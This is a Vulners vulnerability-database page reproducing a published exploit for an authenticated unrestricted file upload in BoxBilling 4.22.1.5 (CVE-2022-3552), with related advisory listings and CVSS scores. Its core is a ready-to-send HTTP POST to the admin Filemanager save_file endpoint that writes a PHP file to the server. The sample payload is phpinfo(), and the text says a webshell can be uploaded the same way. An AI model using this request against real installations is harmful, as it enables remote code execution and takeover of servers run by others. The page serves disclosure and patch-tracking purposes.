Vulners
Lucene search
BoxBilling 4.22.1.5 Remote Code Execution
๐๏ธย 28 Mar 2023ย 00:00:00Reported byย zetc0deTypeย 
ย packetstorm๐ย packetstormsecurity.com๐ย 339ย Views
| Reporter | Title | Published | Views | Family All 17 |
|---|---|---|---|---|
 | BoxBilling <= 4.22.1.5 - Remote Code Execution Vulnerability | 28 Mar 202300:00 | โ | zdt |
 | Exploit for Unrestricted Upload of File with Dangerous Type in Boxbilling | 1 Apr 202311:53 | โ | githubexploit |
| Exploit for Unrestricted Upload of File with Dangerous Type in Boxbilling | 1 Apr 202311:53 | โ | githubexploit |
| Exploit for Unrestricted Upload of File with Dangerous Type in Boxbilling | 27 Apr 202518:37 | โ | githubexploit |
 | BoxBilling <=4.22.1.5 - Authenticated Unrestricted File Upload - RCE | 18 Sep 202211:31 | โ | huntr |
 | CVE-2022-3552 | 18 Oct 202200:13 | โ | circl |
 | BoxBilling ไปฃ็ ้ฎ้ขๆผๆด | 17 Oct 202200:00 | โ | cnnvd |
 | CVE-2022-3552 | 17 Oct 202200:00 | โ | cve |
 | CVE-2022-3552 Unrestricted Upload of File with Dangerous Type in boxbilling/boxbilling | 17 Oct 202200:00 | โ | cvelist |
 | BoxBilling<=4.22.1.5 - Remote Code Execution (RCE) | 28 Mar 202300:00 | โ | exploitdb |
10
`# Exploit Title: BoxBilling<=4.22.1.5 - Remote Code Execution (RCE)
# Date: 2022-09-18
# Exploit Author: zetc0de
# Vendor Homepage: https://www.boxbilling.org/
# Software Link:
https://github.com/boxbilling/boxbilling/releases/download/4.22.1.5/BoxBilling.zip
# Version: <=4.22.1.5 (Latest)
# Tested on: Windows 10
# CVE : CVE-2022-3552
# BoxBilling was vulnerable to Unrestricted File Upload.
# In order to exploit the vulnerability, an attacker must have a valid
authenticated session as admin on the CMS.
# With at least 1 order of product an attacker can upload malicious file to
hidden API endpoint that contain a webshell and get RCE
###################################################################################
## POC
POST /index.php?_url=/api/admin/Filemanager/save_file HTTP/1.1
Host: local.com:8089
Content-Length: 52
Accept: application/json, text/javascript, */*; q=0.01
DNT: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=3nrf9i4mv28o5anva77ltq042d
Connection: close
order_id=1&path=ax.php&data=<%3fphp+phpinfo()%3b%3f>
POC Video :
https://drive.google.com/file/d/1m2glCeJ9QXc8epuY2QfvbWwjLTJ8_Hjx/view?usp=sharing
`
Data
Build on a solid foundation withย Vulners data
Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data
Api
Power your application withย Vulners API
The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access
App
Assess and manage vulnerabilities withย Vulnersย tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
28 Mar 2023 00:00Current
7High risk
Vulners AI Score7
CVSS 3.17.2
CVSS 37.2
EPSS0.55788
SSVC